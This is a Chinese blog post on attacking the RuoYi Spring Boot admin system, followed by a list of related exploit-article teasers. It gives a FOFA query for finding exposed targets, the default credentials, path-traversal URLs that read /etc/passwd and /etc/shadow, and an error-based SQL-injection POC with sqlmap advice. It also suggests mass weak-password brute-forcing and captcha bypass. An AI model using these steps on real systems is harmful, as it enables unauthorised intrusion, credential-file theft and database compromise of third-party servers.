若依管理系统漏洞利用
若依(RuoYi)管理系统 后台任意文件读取,SQL注入
一、若依管理系统简介
基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用
二、若依管理系统后台任意文件下载
该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码
fofa搜索语句:app=”若依-管理系统”
账号:admin
密码:admin123
登陆成功后直接访问
http://目标网站url/common/download/resource?resource=/profile/../../../../etc/passwd
http://目标网站url//common/download/resource?resource=/profile/../../../../etc/shadow
三、若依管理系统SQL注入漏洞
该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码
直接burp抓包构造POST请求数据包(构建关键点)
1.POST请求
2.请求目录/system/role/list
3.请求POC(见下文)
POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and
extractvalue(1,concat(0x7e,substring((*),1,32),0x7e))
POC我直接写的星号指定注入位置,可以直接放到sqlmap中去跑,不指定位置sqlmap跑不出来(可能是我太笨了)
ps:有兴趣的同学可以写个脚本去跑(大佬和小白就不用看了,闲人专享)
简单思路可以先去批量去跑弱口令,这个很快,验证码是可以通过验证码识别网站去绕过的,登陆到后台之后构建请求包,博主已经实现了,代码过于杂乱就不分享了。
若依管理系统漏洞利用相关推荐
- 利用新云网站管理系统漏洞成功获取某大型书店Webshell
利用新云网站管理系统漏洞成功获取某大型书店Webshell 声明:本文仅做安全技术研究,请勿用来做违法事! 通过本文可以学到: ①了解新云网站管理系统 ②利用新云网站管理系统存在的SQL注入漏洞.文件 ...
- mysql 渗透及漏洞利用总结
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP.和WAMP等,在针对网站渗透中,很 ...
- linux etc 漏洞利用,漏洞利用 | 看我如何利用Kerberos EoP渗透你的Linux系统
写在前面的话 在一次红队分析中,我们成功以非特权用户的身份在一个外围网页中实现了命令执行.本文将介绍并分析漏洞(CVE-2018-1685)以及该漏洞的利用方式,该漏洞允许攻击者读取目标主机中的任意文 ...
- phpcms2008网站漏洞如何修复 远程代码写入缓存漏洞利用
SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客 ...
- Botnet趋势漏洞利用状况分析
执行摘要 在过去的一年中,世界遭受了新冠疫情的袭击,生产生活受到了极大的影响.但在网络世界中,僵 尸网络作为多年来的主要威胁形式之一,并未受到疫情的影响,反而更加活.今年,绿盟科技和国家 互联网 应急 ...
- 护卫神mysql提权_护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)...
"护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机.SQL Server和 ...
- 护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)
"护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机.SQL Server和 ...
- (23)【漏洞利用】【原理、利用过程】中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞
目录 解析漏洞: 原理: 变化因素: 熟知的中间件(解析漏洞) 0x01 IIS5.x-6.x解析漏洞: (1)目录解析漏洞(IIS6.0) 原理: 利用过程: (2)文件解析漏洞 原理: 利用 ...
- 常见端口漏洞利用总结
21端口渗透剖析 FTP通常用作对远程服务器进行管理,典型应用就是对web系统进行管理.一旦FTP密码泄露就直接威胁web系统安全,甚至黑客通过提权可以直接控制服务器.这里剖析渗透FTP服务器的几种方 ...
- 行走的漏洞利用机器人:僵尸网络病毒携71个EXP占领高地
前言 僵尸网络 Botnet 是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络. 攻击者通过各种途径传播僵尸程序感染互联 ...
最新文章
- java swing setborder_Swing编程边框(Border)的用法总结
- linux 驱动 内核模式,Linux内核模块和驱动的编写
- thinkphp5的目录结构和命名规范
- niginx查看服务器日志信息,nginx 远程日志服务器
- 八. 输入输出(IO)操作3.面向字符的输出流
- Python之pandas:pandas中缺失值与空值处理的简介及常用函数(drop()、dropna()、isna()、isnull()、fillna())函数详解之详细攻略
- 《集体智慧编程》数学公式
- 封校大学生无聊玩起图像大找茬——游戏脚本(一起领略Python脚本的风采吧)
- 夜天之书 #34 企业如何实践开源协同
- STC8H开发(十四): I2C驱动RX8025T高精度实时时钟芯片
- 密码:大写字母 小写字母 数字 特殊字符(四种里至少三种)
- C# WPF – 利用“Attached Property” 把 RoutedEvent 接上 ICommand
- 静态创意和动态创意_8种独特且价格合理的名片的创意
- python适合做网站吗_零基础学python—做网站
- KBL410-ASEMI整流桥KBL410
- 前端角度出发做好SEO需要考虑什么?
- iOS端的UI设计文档
- Android常用颜色大全
- bzoj1001/BJOI2006 狼抓兔子
- DSP28335通过FFT变换实现高频滤波